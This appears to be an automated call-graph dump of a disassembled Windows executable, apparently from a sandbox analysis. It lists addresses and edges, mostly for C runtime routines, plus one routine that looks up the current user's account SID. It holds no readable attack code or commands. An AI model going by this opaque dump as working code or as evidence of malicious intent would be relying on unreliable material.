20155 41881d 20156 418864 20155->20156 20157 418842 20155->20157 20162 4188b1 EnterCriticalSection 20155->20162 20219 418914 20156->20219 20159 4185e4 __wsopen_s 15 API calls 20157->20159 20161 418847 20159->20161 20161->20156 20222 418732 EnterCriticalSection 20161->20222 20162->20156 20163 4188be LeaveCriticalSection 20162->20163 20163->20155 20165->20119 20166->20125 20168 418764 20167->20168 20169 4187cd 20167->20169 20168->20169 20174 41878a __wsopen_s 20168->20174 20170 413c57 _free 14 API calls 20169->20170 20171 4187d2 20170->20171 20172 413c44 __dosmaperr 14 API calls 20171->20172 20173 4187ba 20172->20173 20173->20129 20176 41e50f 20173->20176 20174->20173 20175 4187b4 SetStdHandle 20174->20175 20175->20173 20177 41e569 20176->20177 20178 41e537 20176->20178 20177->20129 20178->20177 20179 41f87f __fread_nolock 27 API calls 20178->20179 20180 41e547 20179->20180 20181 41e557 20180->20181 20182 41e56d 20180->20182 20183 413c44 __dosmaperr 14 API calls 20181->20183 20184 41b29a __fread_nolock 37 API calls 20182->20184 20185 41e55c 20183->20185 20186 41e57f 20184->20186 20185->20177 20188 413c57 _free 14 API calls 20185->20188 20187 41e595 20186->20187 20224 4220ae 20186->20224 20187->20185 20189 41f87f __fread_nolock 27 API calls 20187->20189 20188->20177 20189->20185 20192 41e0dd 20191->20192 20208 41e239 20191->20208 20198 41e0fd 20192->20198 20264 416442 20192->20264 20194 41e0f4 20195 41e2f5 20194->20195 20194->20198 20196 4156cc __cftof 11 API calls 20195->20196 20197 41e2ff 20196->20197 20200 41e1b1 20198->20200 20201 41f87f __fread_nolock 27 API calls 20198->20201 20198->20208 20199 41b29a __fread_nolock 37 API calls 20204 41e1d6 20199->20204 20200->20199 20203 41e234 20200->20203 20200->20208 20209 41e204 20200->20209 20202 41e218 20201->20202 20207 41f87f __fread_nolock 27 API calls 20202->20207 20202->20209 20205 413c57 _free 14 API calls 20203->20205 20204->20203 20206 41e284 20204->20206 20204->20209 20210 41e262 20204->20210 20211 41e255 20204->20211 20205->20208 20213 41f87f __fread_nolock 27 API calls 20206->20213 20207->20200 20208->20134 20208->20135 20209->20203 20209->20208 20215 419620 __wsopen_s 62 API calls 20209->20215 20210->20206 20212 41e269 20210->20212 20214 413c57 _free 14 API calls 20211->20214 20216 41f87f __fread_nolock 27 API calls 20212->20216 20213->20209 20214->20203 20215->20209 20216->20209 20217->20140 20218->20155 20223 41698b LeaveCriticalSection 20219->20223 20221 418884 20221->20108 20221->20109 20222->20156 20223->20221 20259 422061 20224->20259 20226 4221fd 20227 413c57 _free 14 API calls 20226->20227 20228 422183 20227->20228 20234 41f87f __fread_nolock 27 API calls 20228->20234 20230 4221af 20230->20228 20231 41f87f __fread_nolock 27 API calls 20230->20231 20235 4221c7 20231->20235 20232 422104 20233 41b7df _free 14 API calls 20232->20233 20236 422110 20233->20236 20237 422214 20234->20237 20235->20226 20239 4189ae __wsopen_s 25 API calls 20235->20239 20238 422118 20236->20238 20251 422125 __wsopen_s 20236->20251 20237->20187 20240 413c57 _free 14 API calls 20238->20240 20241 4221d7 SetEndOfFile 20239->20241 20258 42211d 20240->20258 20241->20228 20242 4221e3 20241->20242 20243 413c57 _free 14 API calls 20242->20243 20245 4221e8 20243->20245 20244 413c57 _free 14 API calls 20247 4221a4 20244->20247 20246 413c44 __dosmaperr 14 API calls 20245->20246 20248 4221f3 GetLastError 20246->20248 20249 417051 _free 14 API calls 20247->20249 20248->20226 20249->20228 20250 419712 __wsopen_s 60 API calls 20250->20251 20251->20250 20252 42218a 20251->20252 20255 422174 __wsopen_s 20251->20255 20253 413c44 __dosmaperr 14 API calls 20252->20253 20254 42218f 20253->20254 20256 413c57 _free 14 API calls 20254->20256 20254->20258 20257 417051 _free 14 API calls 20255->20257 20256->20258 20257->20228 20258->20244 20260 41f87f __fread_nolock 27 API calls 20259->20260 20261 42207a 20260->20261 20262 41f87f __fread_nolock 27 API calls 20261->20262 20263 422089 20262->20263 20263->20226 20263->20230 20263->20232 20265 416463 20264->20265 20266 41644e 20264->20266 20265->20194 20267 413c57 _free 14 API calls 20266->20267 20268 416453 20267->20268 20269 41569f __cftof 25 API calls 20268->20269 20270 41645e 20269->20270 20270->20194 20271->20094 20272 40f8b0 20273 40f8d0 20272->20273 20273->20273 20274 40fc60 26 API calls 20273->20274 20275 40f8e2 20274->20275 18293 401f40 GetUserNameW GetProcessHeap HeapAlloc GetUserNameW 18294 401f9d LookupAccountNameW GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 18293->18294 18295 40209f 7 API calls 18293->18295 18294->18295 18296 401fe5 18294->18296 18296->18295 18297 401fed LookupAccountNameW 18296->18297 18297->18295 18298 40200c ConvertSidToStringSidW 18297->18298 18298->18295 18299 40201f 18298->18299 18302 40fc60 18299->18302 18301 402096 18306 40fc76 18302->18306 18307 40fc9e 18302->18307 18303 40fd7c 18335 4103a0 18303->18335 18305 40fd81 18338 401e10 18305->18338 18306->18301 18307->18303 18309 40fce6 18307->18309 18310 40fd0b 18307->18310 18309->18305 18317 41074a 18309->18317 18313 41074a 26 API calls 18310->18313 18314 40fcf7 __fread_nolock 18310->18314 18313->18314 18315 40fd5e 18314->18315 18330 4156af 18314->18330 18315->18301 18318 41074f ___std_exception_copy 18317->18318 18319 410769 18318->18319 18321 41076b 18318->18321 18353 41571a 18318->18353 18319->18314 18322 401e10 Concurrency::cancel_current_task 18321->18322 18323 410775 18321->18323 18344 4113a6 18322->18344 18325 4113a6 Concurrency::cancel_current_task RaiseException 18323->18325 18328 410c72 18325->18328 18326 401e2c 18347 411324 18326->18347 18331 41563b __cftof 25 API calls 18330->18331 18332 4156be 18331->18332 18333 4156cc __cftof 11 API calls 18332->18333 18334 4156cb 18333->18334 18531 41070a 18335->18531 18339 401e1e Concurrency::cancel_current_task 18338->18339 18340 4113a6 Concurrency::cancel_current_task RaiseException 18339->18340 18341 401e2c 18340->18341 18342 411324 ___std_exception_copy 25 API calls 18341->18342 18343 401e53 18342->18343 18345 4113f0 RaiseException 18344->18345 18346 4113c0 18344->18346 18345->18326 18346->18345 18348 411331 ___std_exception_copy 18347->18348 18352 401e53 18347->18352 18351 41135e 18348->18351 18348->18352 18356 416779 18348->18356 18365 4151b7 18351->18365 18352->18314 18520 415747 18353->18520 18357 416786 18356->18357 18359 416794 18356->18359 18357->18359 18363 4167ab 18357->18363 18368 413c57 18359->18368 18360 41679c 18371 41569f 18360->18371 18362 4167a6 18362->18351 18363->18362 18364 413c57 _free 14 API calls 18363->18364 18364->18360 18366 417051 _free 14 API calls 18365->18366 18367 4151cf 18366->18367 18367->18352 18374 417a99 GetLastError 18368->18374 18370 413c5c 18370->18360 18494 41563b 18371->18494 18373 4156ab 18373->18362 18375 417ab0 18374->18375 18378 417ab6 18374->18378 18397 417e80 18375->18397 18394 417abc SetLastError 18378->18394 18402 417ebf 18378->18402 18383 417b03 18385 417ebf _free 6 API calls 18383->18385 18384 417aec 18386 417ebf _free 6 API calls 18384->18386 18388 417b0f 18385->18388 18387 417afa 18386->18387 18414 417051 18387->18414 18389 417b13 18388->18389 18390 417b24 18388->18390 18392 417ebf _free 6 API calls 18389->18392 18420 417770 18390->18420 18392->18387 18394->18370 18396 417051 _free 12 API calls 18396->18394 18425 417cc3 18397->18425 18399 417e9c 18400 417ea5 18399->18400 18401 417eb7 TlsGetValue 18399->18401 18400->18378 18403 417cc3 _free 5 API calls 18402->18403 18404 417edb 18403->18404 18405 417ad4 18404->18405 18406 417ef9 TlsSetValue 18404->18406 18405->18394 18407 41b7df 18405->18407 18408 41b7ec _free 18407->18408 18409 41b82c 18408->18409 18410 41b817 RtlAllocateHeap 18408->18410 18413 41571a _free 2 API calls 18408->18413 18411 413c57 _free 13 API calls 18409->18411 18410->18408 18412 417ae4 18410->18412 18411->18412 18412->18383 18412->18384 18413->18408 18415 41705c HeapFree 18414->18415 18419 417085 _free 18414->18419 18416 417071 18415->18416 18415->18419 18417 413c57 _free 12 API calls 18416->18417 18418 417077 GetLastError 18417->18418 18418->18419 18419->18394 18438 417604 18420->18438 18426 417cf1 18425->18426 18427 417ced _free 18425->18427 18426->18427 18431 417bfc 18426->18431 18427->18399 18430 417d0b GetProcAddress 18430->18427 18436 417c0d 18431->18436 18432 417cb8 18432->18427 18432->18430 18433 417c2b LoadLibraryExW 18434 417c46 GetLastError 18433->18434 18433->18436 18434->18436 18435 417ca1 FreeLibrary 18435->18436 18436->18432 18436->18433 18436->18435 18437 417c79 LoadLibraryExW 18436->18437 18437->18436 18439 417610 ___scrt_is_nonwritable_in_current_image 18438->18439 18452 416943 EnterCriticalSection 18439->18452 18441 41761a 18453 41764a 18441->18453 18444 417716 18445 417722 ___scrt_is_nonwritable_in_current_image 18444->18445 18457 416943 EnterCriticalSection 18445->18457 18447 41772c 18458 4178f7 18447->18458 18449 417744 18462 417764 18449->18462 18452->18441 18456 41698b LeaveCriticalSection 18453->18456 18455 417638 18455->18444 18456->18455 18457->18447 18459 41792d __cftof 18458->18459 18460 417906 __cftof 18458->18460 18459->18449 18460->18459 18465 41d57b 18460->18465 18493 41698b LeaveCriticalSection 18462->18493 18464 417752 18464->18396 18466 41d5fb 18465->18466 18468 41d591 18465->18468 18469 417051 _free 14 API calls 18466->18469 18492 41d649 18466->18492 18467 41d6ec __cftof 14 API calls 18476 41d657 18467->18476 18468->18466 18470 41d5c4 18468->18470 18474 417051 _free 14 API calls 18468->18474 18471 41d61d 18469->18471 18480 417051 _free 14 API calls 18470->18480 18491 41d5e6 18470->18491 18472 417051 _free 14 API calls 18471->18472 18475 41d630 18472->18475 18473 417051 _free 14 API calls 18477 41d5f0 18473->18477 18479 41d5b9 18474->18479 18481 417051 _free 14 API calls 18475->18481 18478 41d6b7 18476->18478 18490 417051 14 API calls _free 18476->18490 18482 417051 _free 14 API calls 18477->18482 18483 417051 _free 14 API calls 18478->18483 18484 41d158 ___free_lconv_mon 14 API calls 18479->18484 18485 41d5db 18480->18485 18486 41d63e 18481->18486 18482->18466 18487 41d6bd 18483->18487 18484->18470 18488 41d256 __cftof 14 API calls 18485->18488 18489 417051 _free 14 API calls 18486->18489 18487->18459 18488->18491 18489->18492 18490->18476 18491->18473 18492->18467 18493->18464 18495 417a99 _free 14 API calls 18494->18495 18496 415646 18495->18496 18498 415654 18496->18498 18502 4156cc IsProcessorFeaturePresent 18496->18502 18498->18373 18499 41569e 18500 41563b __cftof 25 API calls 18499->18500 18501 4156ab 18500->18501 18501->18373 18503 4156d8 18502->18503 18506 4154f3 18503->18506 18507 41550f ___scrt_fastfail 18506->18507 18508 41553b IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18507->18508 18511 41560c ___scrt_fastfail 18508->18511 18510 41562a GetCurrentProcess TerminateProcess 18510->18499 18512 4111f2 18511->18512 18513 4111fb 18512->18513 18514 4111fd IsProcessorFeaturePresent 18512->18514 18513->18510 18516 41123f 18514->18516 18519 411203 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 18516->18519 18518 411322 18518->18510 18519->18518 18521 415753 ___scrt_is_nonwritable_in_current_image 18520->18521 18526 416943 EnterCriticalSection 18521->18526 18523 41575e 18527 41579a 18523->18527 18526->18523 18530 41698b LeaveCriticalSection 18527->18530 18529 415725 18529->18318 18530->18529 18536 410649 18531->18536 18534 4113a6 Concurrency::cancel_current_task RaiseException 18535 410729 18534->18535 18539 4105bf 18536->18539 18540 411324 ___std_exception_copy 25 API calls 18539->18540 18541 4105eb 18540->18541 18541->18534 19457 7fe420ec LoadLibraryA 18542 405f60 18607 40f8f0 18542->18607 18544 405f6f 18621 403d90 18544->18621 18546 405f77 18633 40fda0 18546->18633 18548 40633a 18551 4156af 25 API calls 18548->18551 18549 405f91 18549->18548 18550 406066 18549->18550 18553 40f8f0 26 API calls 18550->18553 18599 406074 18550->18599 18552 40633f 18551->18552 18554 4156af 25 API calls 18552->18554 18556 406096 18553->18556 18557 406344 18554->18557 18555 40fc60 26 API calls 18558 406304 18555->18558 18559 403d90 26 API calls 18556->18559 18560 4156af 25 API calls 18557->18560 18562 406349 __wsopen_s 18557->18562 18561 40609e 18559->18561 18560->18562 18563 40fda0 26 API calls 18561->18563 18641 412e34 18562->18641 18577 4060b8 18563->18577 18567 406387 18569 40f8f0 26 API calls 18567->18569 18568 40655a 18572 406396 18569->18572 18570 4064ef 18570->18568 18571 4156af 25 API calls 18570->18571 18573 40657a 18571->18573 18574 403d90 26 API calls 18572->18574 18575 40639e 18574->18575 18578 412e34 28 API calls 18575->18578 18576 40618d 18579 40f8f0 26 API calls 18576->18579 18576->18599 18577->18552 18577->18576 18580 4063bb 18578->18580 18581 4061bd 18579->18581 18582 4063ea 18580->18582 18587 40656b 18580->18587 18583 403d90 26 API calls 18581->18583 18584 40f8f0 26 API calls 18582->18584 18585 4061c5 18583->18585 18586 406415 18584->18586 18590 40fda0 26 API calls 18585->18590 18588 403d90 26 API calls 18586->18588 18589 4156af 25 API calls 18587->18589 18591 40641d 18588->18591 18592 406570 18589->18592 18597 4061df 18590->18597 18594 412e34 28 API calls 18591->18594 18593 4156af 25 API calls 18592->18593 18593->18570 18595 40643a 18594->18595 18595->18592 18601 406469 18595->18601 18597->18557 18597->18599 18599->18555 18602 4064e0 18601->18602 18657 4153b8 18601->18657 18660 413b7b 18601->18660 18670 412d51 18601->18670 18677 412d25 18601->18677 18604 412ec2 67 API calls 18602->18604 18605 4064e6 18604->18605 18606 412ec2 67 API calls 18605->18606 18606->18570 18608 40f915 18607->18608 18609 40f91c 18608->18609 18610 40f96e 18608->18610 18611 40f94f 18608->18611 18609->18544 18615 41074a 26 API calls 18610->18615 18619 40f963 __fread_nolock 18610->18619 18612 40f9a4 18611->18612 18613 40f956 18611->18613 18616 401e10 Concurrency::cancel_current_task 26 API calls 18612->18616 18614 41074a 26 API calls 18613->18614 18617 40f95c 18614->18617 18615->18619 18616->18617 18618 4156af 25 API calls 18617->18618 18617->18619 18620 40f9ae 18618->18620 18619->18544 18684 40f450 18621->18684 18623 403dbc 18624 403e11 18623->18624 18703 40f5f0 18623->18703 18698 40f750 18624->18698 18627 403f66 18629 4156af 25 API calls 18627->18629 18632 403f8c 18627->18632 18628 403e1d ___scrt_fastfail 18628->18627 18631 40fc60 26 API calls 18628->18631 18630 403fa4 18629->18630 18631->18627 18632->18546 18634 40fe0d 18633->18634 18635 40fdc3 18633->18635 18637 40fe1c 18634->18637 18725 410100 18634->18725 18635->18634 18636 40fdcc 18635->18636 18720 4103b0 18636->18720 18637->18549 18640 40fdd5 18640->18549 18755 412d7d 18641->18755 18644 412ec2 18645 412ece ___scrt_is_nonwritable_in_current_image 18644->18645 18646 412ed8 18645->18646 18647 412eed 18645->18647 18648 413c57 _free 14 API calls 18646->18648 18653 412ee8 18647->18653 18811 416af7 EnterCriticalSection 18647->18811 18649 412edd 18648->18649 18651 41569f __cftof 25 API calls 18649->18651 18651->18653 18652 412f0a 18812 412e4b 18652->18812 18653->18567 18655 412f15 18828 412f3c 18655->18828 19245 4153d5 18657->19245 18661 413ba6 18660->18661 18662 413b89 18660->18662 18661->18601 18662->18661 18663 413b96 18662->18663 18664 413baa 18662->18664 18665 413c57 _free 14 API calls 18663->18665 19388 41395c 18664->19388 18667 413b9b 18665->18667 18669 41569f __cftof 25 API calls 18667->18669 18669->18661 18671 412d71 18670->18671 18672 412d5d 18670->18672 18671->18601 18673 413c57 _free 14 API calls 18672->18673 18674 412d62 18673->18674 18675 41569f __cftof 25 API calls 18674->18675 18676 412d6d 18675->18676 18676->18601 18678 412d31 18677->18678 18679 412d45 18677->18679 18680 413c57 _free 14 API calls 18678->18680 18679->18601 18681 412d36 18680->18681 18682 41569f __cftof 25 API calls 18681->18682 18683 412d41 18682->18683 18683->18601 18685 40f46b 18684->18685 18697 40f545 __fread_nolock 18684->18697 18686 40f5d2 18685->18686 18689 40f4f2 18685->18689 18690 40f4c8 18685->18690 18696 40f4d9 __fread_nolock 18685->18696 18685->18697 18687 4103a0 26 API calls 18686->18687 18688 40f5d7 18687->18688 18691 401e10 Concurrency::cancel_current_task 26 API calls 18688->18691 18694 41074a 26 API calls 18689->18694 18689->18696 18690->18688 18693 41074a 26 API calls 18690->18693 18692 40f5dc 18691->18692 18693->18696 18694->18696 18695 4156af 25 API calls 18695->18686 18696->18695 18696->18697 18697->18623 18699 40f781 18698->18699 18700 40f75e 18698->18700 18699->18628 18700->18699 18701 4156af 25 API calls 18700->18701 18702 40f7cc 18701->18702 18704 40f62a 18703->18704 18705 40f60a 18703->18705 18706 40f736 18704->18706 18707 40f63c 18704->18707 18705->18623 18708 4103a0 26 API calls 18706->18708 18711 40f699 18707->18711 18712 40f66f 18707->18712 18709 40f73b 18708->18709 18710 401e10 Concurrency::cancel_current_task 26 API calls 18709->18710 18718 40f680 __fread_nolock 18710->18718 18714 41074a 26 API calls 18711->18714 18711->18718 18712->18709 18713 40f67a 18712->18713 18716 41074a 26 API calls 18713->18716 18714->18718 18715 4156af 25 API calls 18717 40f745 18715->18717 18716->18718 18718->18715 18719 40f6fd __fread_nolock 18718->18719 18719->18623 18721 4103c4 18720->18721 18724 4103d5 __fread_nolock 18721->18724 18740 410470 18721->18740 18723 41045b 18723->18640 18724->18640 18726 410125 18725->18726 18727 41023c 18725->18727 18731 410160 18726->18731 18732 41018a 18726->18732 18728 4103a0 26 API calls 18727->18728 18729 410241 18728->18729 18730 401e10 Concurrency::cancel_current_task 26 API calls 18729->18730 18738 410171 __fread_nolock 18730->18738 18731->18729 18733 41016b 18731->18733 18734 41074a 26 API calls 18732->18734 18732->18738 18736 41074a 26 API calls 18733->18736 18734->18738 18735 4156af 25 API calls 18737 41024b 18735->18737 18736->18738 18738->18735 18739 4101fa __fread_nolock 18738->18739 18739->18637 18741 410495 18740->18741 18742 410597 18740->18742 18746 4104d0 18741->18746 18747 4104f7 18741->18747 18743 4103a0 26 API calls 18742->18743 18744 41059c 18743->18744 18745 401e10 Concurrency::cancel_current_task 26 API calls 18744->18745 18753 4104e1 __fread_nolock 18745->18753 18746->18744 18748 4104db 18746->18748 18749 41074a 26 API calls 18747->18749 18747->18753 18751 41074a 26 API calls 18748->18751 18749->18753 18750 4156af 25 API calls 18752 4105a6 18750->18752 18751->18753 18753->18750 18754 41055f __fread_nolock 18753->18754 18754->18723 18758 412d89 ___scrt_is_nonwritable_in_current_image 18755->18758 18756 412d90 18757 413c57 _free 14 API calls 18756->18757 18759 412d95 18757->18759 18758->18756 18760 412db0 18758->18760 18761 41569f __cftof 25 API calls 18759->18761 18762 412dc2 18760->18762 18763 412db5 18760->18763 18764 406376 18761->18764 18772 416b1f 18762->18772 18765 413c57 _free 14 API calls 18763->18765 18764->18570 18764->18644 18765->18764 18768 412dd2 18770 413c57 _free 14 API calls 18768->18770 18769 412ddf 18780 412e1d 18769->18780 18770->18764 18773 416b2b ___scrt_is_nonwritable_in_current_image 18772->18773 18784 416943 EnterCriticalSection 18773->18784 18775 416b39 18785 416bc3 18775->18785 18781 412e21 18780->18781 18810 416b0b LeaveCriticalSection 18781->18810 18783 412e32 18783->18764 18784->18775 18793 416be6 18785->18793 18786 416c3e 18787 41b7df _free 14 API calls 18786->18787 18788 416c47 18787->18788 18790 417051 _free 14 API calls 18788->18790 18791 416c50 18790->18791 18797 416b46 18791->18797 18803 417f01 18791->18803 18793->18786 18793->18797 18801 416af7 EnterCriticalSection 18793->18801 18802 416b0b LeaveCriticalSection 18793->18802 18798 416b7f 18797->18798 18809 41698b LeaveCriticalSection 18798->18809 18800 412dcb 18800->18768 18800->18769 18801->18793 18802->18793 18804 417cc3 _free 5 API calls 18803->18804 18805 417f1d 18804->18805 18806 417f3b InitializeCriticalSectionAndSpinCount 18805->18806 18807 416c6f 18805->18807 18806->18807 18808 416af7 EnterCriticalSection 18807->18808 18808->18797 18809->18800 18810->18783 18811->18652 18813 412e58 18812->18813 18814 412e6d 18812->18814 18815 413c57 _free 14 API calls 18813->18815 18819 412e68 18814->18819 18831 417484 18814->18831 18817 412e5d 18815->18817 18818 41569f __cftof 25 API calls 18817->18818 18818->18819 18819->18655 18824 412e90 18848 417117 18824->18848 18827 417051 _free 14 API calls 18827->18819 19244 416b0b LeaveCriticalSection 18828->19244 18830 412f44 18830->18653 18832 412e82 18831->18832 18833 41749c 18831->18833 18837 417267 18832->18837 18833->18832 18834 417240 __fread_nolock 25 API calls 18833->18834 18835 4174ba 18834->18835 18863 419620 18835->18863 18838 412e8a 18837->18838 18839 41727e 18837->18839 18841 417240 18838->18841 18839->18838 18840 417051 _free 14 API calls 18839->18840 18840->18838 18842 417261 18841->18842 18843 41724c 18841->18843 18842->18824 18844 413c57 _free 14 API calls 18843->18844 18845 417251 18844->18845 18846 41569f __cftof 25 API calls 18845->18846 18847 41725c 18846->18847 18847->18824 18849 417128 18848->18849 18853 41713d 18848->18853 18850 413c44 __dosmaperr 14 API calls 18849->18850 18852 41712d 18850->18852 18851 417186 18854 413c44 __dosmaperr 14 API calls 18851->18854 18855 413c57 _free 14 API calls 18852->18855 18853->18851 18856 417164 18853->18856 18857 41718b 18854->18857 18861 412e96 18855->18861 19204 41708b 18856->19204 18858 413c57 _free 14 API calls 18857->18858 18860 417193 18858->18860 18862 41569f __cftof 25 API calls 18860->18862 18861->18819 18861->18827 18862->18861 18864 41962c ___scrt_is_nonwritable_in_current_image 18863->18864 18865 419634 18864->18865 18867 41964c 18864->18867 18933 413c44 18865->18933 18868 4196e7 18867->18868 18872 41967e 18867->18872 18870 413c44 __dosmaperr 14 API calls 18868->18870 18873 4196ec 18870->18873 18871 413c57 _free 14 API calls 18887 419641 18871->18887 18888 418732 EnterCriticalSection 18872->18888 18875 413c57 _free 14 API calls 18873->18875 18877 4196f4 18875->18877 18876 419684 18878 4196a0 18876->18878 18879 4196b5 18876->18879 18880 41569f __cftof 25 API calls 18877->18880 18882 413c57 _free 14 API calls 18878->18882 18889 419712 18879->18889 18880->18887 18884 4196a5 18882->18884 18883 4196b0 18936 4196df 18883->18936 18885 413c44 __dosmaperr 14 API calls 18884->18885 18885->18883 18887->18832 18888->18876 18890 419734 18889->18890 18928 419750 18889->18928 18891 419738 18890->18891 18893 419788 18890->18893 18892 413c44 __dosmaperr 14 API calls 18891->18892 18894 41973d 18892->18894 18896 41979b 18893->18896 18946 41f87f 18893->18946 18895 413c57 _free 14 API calls 18894->18895 18897 419745 18895->18897 18939 4192b9 18896->18939 18900 41569f __cftof 25 API calls 18897->18900 18900->18928 18902 4197b1 18906 4197b5 18902->18906 18907 4197da 18902->18907 18903 4197f0 18904 419804 18903->18904 18905 419849 WriteFile 18903->18905 18910 419839 18904->18910 18911 41980f 18904->18911 18908 41986d GetLastError 18905->18908 18914 4197d0 18905->18914 18906->18914 18949 419251 18906->18949 18954 418ea7 GetConsoleCP 18907->18954 18908->18914 18982 41932a 18910->18982 18915 419814 18911->18915 18916 419829 18911->18916 18920 419893 18914->18920 18921 4198bd 18914->18921 18914->18928 18915->18914 18918 419819 18915->18918 18974 4194ee 18916->18974 18917 419827 18917->18914 18967 419405 18918->18967 18923 4198b1 18920->18923 18924 41989a 18920->18924 18926 413c57 _free 14 API calls 18921->18926 18921->18928 18989 413c21 18923->18989 18927 413c57 _free 14 API calls 18924->18927 18929 4198d5 18926->18929 18930 41989f 18927->18930 18928->18883 18931 413c44 __dosmaperr 14 API calls 18929->18931 18932 413c44 __dosmaperr 14 API calls 18930->18932 18931->18928 18932->18928 18934 417a99 _free 14 API calls 18933->18934 18935 413c49 18934->18935 18935->18871 19203 4187e7 LeaveCriticalSection 18936->19203 18938 4196e5 18938->18887 18994 41f686 18939->18994 18941 4192ca 18945 419320 18941->18945 19003 417942 GetLastError 18941->19003 18944 419307 GetConsoleMode 18944->18945 18945->18902 18945->18903 19101 41f7e8 18946->19101 18952 4192a8 18949->18952 18953 419273 18949->18953 18950 41fa01 5 API calls __wsopen_s 18950->18953 18951 4192aa GetLastError 18951->18952 18952->18914 18953->18950 18953->18951 18953->18952 19123 413015 18954->19123 18956 4111f2 _ValidateLocalCookies 5 API calls 18957 41924f 18956->18957 18957->18914 18959 419d94 38 API calls __fassign 18963 418f03 __fread_nolock 18959->18963 18960 4191a3 18960->18956 18963->18959 18963->18960 18964 419126 WriteFile 18963->18964 18966 41915e WriteFile 18963->18966 19131 41f906 18963->19131 19141 41ab93 18963->19141 19146 41c82b 18963->19146 18964->18963 18965 41921f GetLastError 18964->18965 18965->18960 18966->18963 18966->18965 18969 419414 __wsopen_s 18967->18969 18968 4194d3 18970 4111f2 _ValidateLocalCookies 5 API calls 18968->18970 18969->18968 18971 419489 WriteFile 18969->18971 18972 4194ec 18970->18972 18971->18969 18973 4194d5 GetLastError 18971->18973 18972->18917 18973->18968 18981 4194fd __wsopen_s 18974->18981 18975 419605 18976 4111f2 _ValidateLocalCookies 5 API calls 18975->18976 18977 41961e 18976->18977 18977->18917 18978 41c82b __cftof WideCharToMultiByte 18978->18981 18979 419607 GetLastError 18979->18975 18980 4195bc WriteFile 18980->18979 18980->18981 18981->18975 18981->18978 18981->18979 18981->18980 18988 419339 __wsopen_s 18982->18988 18983 4193ea 18984 4111f2 _ValidateLocalCookies 5 API calls 18983->18984 18985 419403 18984->18985 18985->18917 18986 4193a9 WriteFile 18987 4193ec GetLastError 18986->18987 18986->18988 18987->18983 18988->18983 18988->18986 18990 413c44 __dosmaperr 14 API calls 18989->18990 18991 413c2c _free 18990->18991 18992 413c57 _free 14 API calls 18991->18992 18993 413c3f 18992->18993 18993->18928 18995 41f6a0 18994->18995 18996 41f693 18994->18996 18998 41f6ac 18995->18998 18999 413c57 _free 14 API calls 18995->18999 18997 413c57 _free 14 API calls 18996->18997 19000 41f698 18997->19000 18998->18941 19001 41f6cd 18999->19001 19000->18941 19002 41569f __cftof 25 API calls 19001->19002 19002->19000 19004 417959 19003->19004 19007 41795f 19003->19007 19005 417e80 _free 6 API calls 19004->19005 19005->19007 19006 417ebf _free 6 API calls 19008 41797d 19006->19008 19007->19006 19027 417965 SetLastError 19007->19027 19009 41b7df _free 14 API calls 19008->19009 19008->19027 19011 41798d 19009->19011 19012 417995 19011->19012 19013 4179ac 19011->19013 19016 417ebf _free 6 API calls 19012->19016 19018 417ebf _free 6 API calls 19013->19018 19014 4179f3 19014->18944 19014->18945 19015 4179f9 19030 4167d3 19015->19030 19019 4179a3 19016->19019 19021 4179b8 19018->19021 19024 417051 _free 14 API calls 19019->19024 19022 4179cd 19021->19022 19023 4179bc 19021->19023 19026 417770 _free 14 API calls 19022->19026 19025 417ebf _free 6 API calls 19023->19025 19024->19027 19025->19019 19028 4179d8 19026->19028 19027->19014 19027->19015 19029 417051 _free 14 API calls 19028->19029 19029->19027 19041 41ceea 19030->19041 19033 4167e3 19035 4167ed IsProcessorFeaturePresent 19033->19035 19040 41680c 19033->19040 19037 4167f9 19035->19037 19038 4154f3 __cftof 8 API calls 19037->19038 19038->19040 19071 412cd3 19040->19071 19074 41ce1c 19041->19074 19044 41cf38 19045 41cf44 ___scrt_is_nonwritable_in_current_image 19044->19045 19046 41cf71 __cftof 19045->19046 19047 417a99 _free 14 API calls 19045->19047 19052 41cf6b __cftof 19045->19052 19055 41cfe2 19046->19055 19080 416943 EnterCriticalSection 19046->19080 19047->19052 19048 41cfb6 19049 413c57 _free 14 API calls 19048->19049 19052->19046 19052->19048 19053 41cfa0 19052->19053 19053->19033 19057 41d02a 19055->19057 19058 41d11f 19055->19058 19068 41d055 19055->19068 19057->19068 19089 412bad 19071->19089 19075 41ce28 ___scrt_is_nonwritable_in_current_image 19074->19075 19076 416943 __cftof EnterCriticalSection 19075->19076 19077 41ce36 19076->19077 19078 41ce74 __cftof LeaveCriticalSection 19077->19078 19079 4167d8 19078->19079 19079->19033 19079->19044 19080->19055 19090 412bbb 19089->19090 19091 412bcd 19089->19091 19110 4189ae 19101->19110 19103 41f7fa 19104 41f813 SetFilePointerEx 19103->19104 19105 41f802 19103->19105 19107 41f82b GetLastError 19104->19107 19108 41f807 19104->19108 19106 413c57 _free 14 API calls 19105->19106 19106->19108 19109 413c21 __dosmaperr 14 API calls 19107->19109 19108->18896 19109->19108 19111 4189bb 19110->19111 19113 4189d0 19110->19113 19112 413c44 __dosmaperr 14 API calls 19111->19112 19114 4189c0 19112->19114 19115 413c44 __dosmaperr 14 API calls 19113->19115 19117 4189f5 19113->19117 19116 413c57 _free 14 API calls 19114->19116 19118 418a00 19115->19118 19119 4189c8 19116->19119 19117->19103 19120 413c57 _free 14 API calls 19118->19120 19119->19103 19121 418a08 19120->19121 19122 41569f __cftof 25 API calls 19121->19122 19122->19119 19124 413035 19123->19124 19125 41302c 19123->19125 19124->19125 19126 417942 __cftof 37 API calls 19124->19126 19125->18963 19127 413055 19126->19127 19149 41803b 19127->19149 19135 41f9bb __wsopen_s 19131->19135 19137 41f91f __wsopen_s 19131->19137 19133 4223d9 __fassign 19 API calls 19133->19135 19134 41f9eb 19138 413c57 _free 14 API calls 19134->19138 19135->19133 19135->19134 19140 41f991 19135->19140 19136 41f9a6 19139 413c57 _free 14 API calls 19136->19139 19137->19136 19137->19140 19194 4223d9 19137->19194 19138->19140 19139->19140 19140->18963 19142 417942 __cftof 37 API calls 19141->19142 19143 41ab9e 19142->19143 19144 41803b __cftof 37 API calls 19143->19144 19145 41abae 19144->19145 19145->18963 19147 41c844 WideCharToMultiByte 19146->19147 19147->18963 19150 41306b 19149->19150 19151 41804e 19149->19151 19153 418068 19150->19153 19151->19150 19157 41d7c7 19151->19157 19154 418090 19153->19154 19155 41807b 19153->19155 19154->19125 19155->19154 19178 41c5b6 19155->19178 19158 41d7d3 ___scrt_is_nonwritable_in_current_image 19157->19158 19159 417942 __cftof 37 API calls 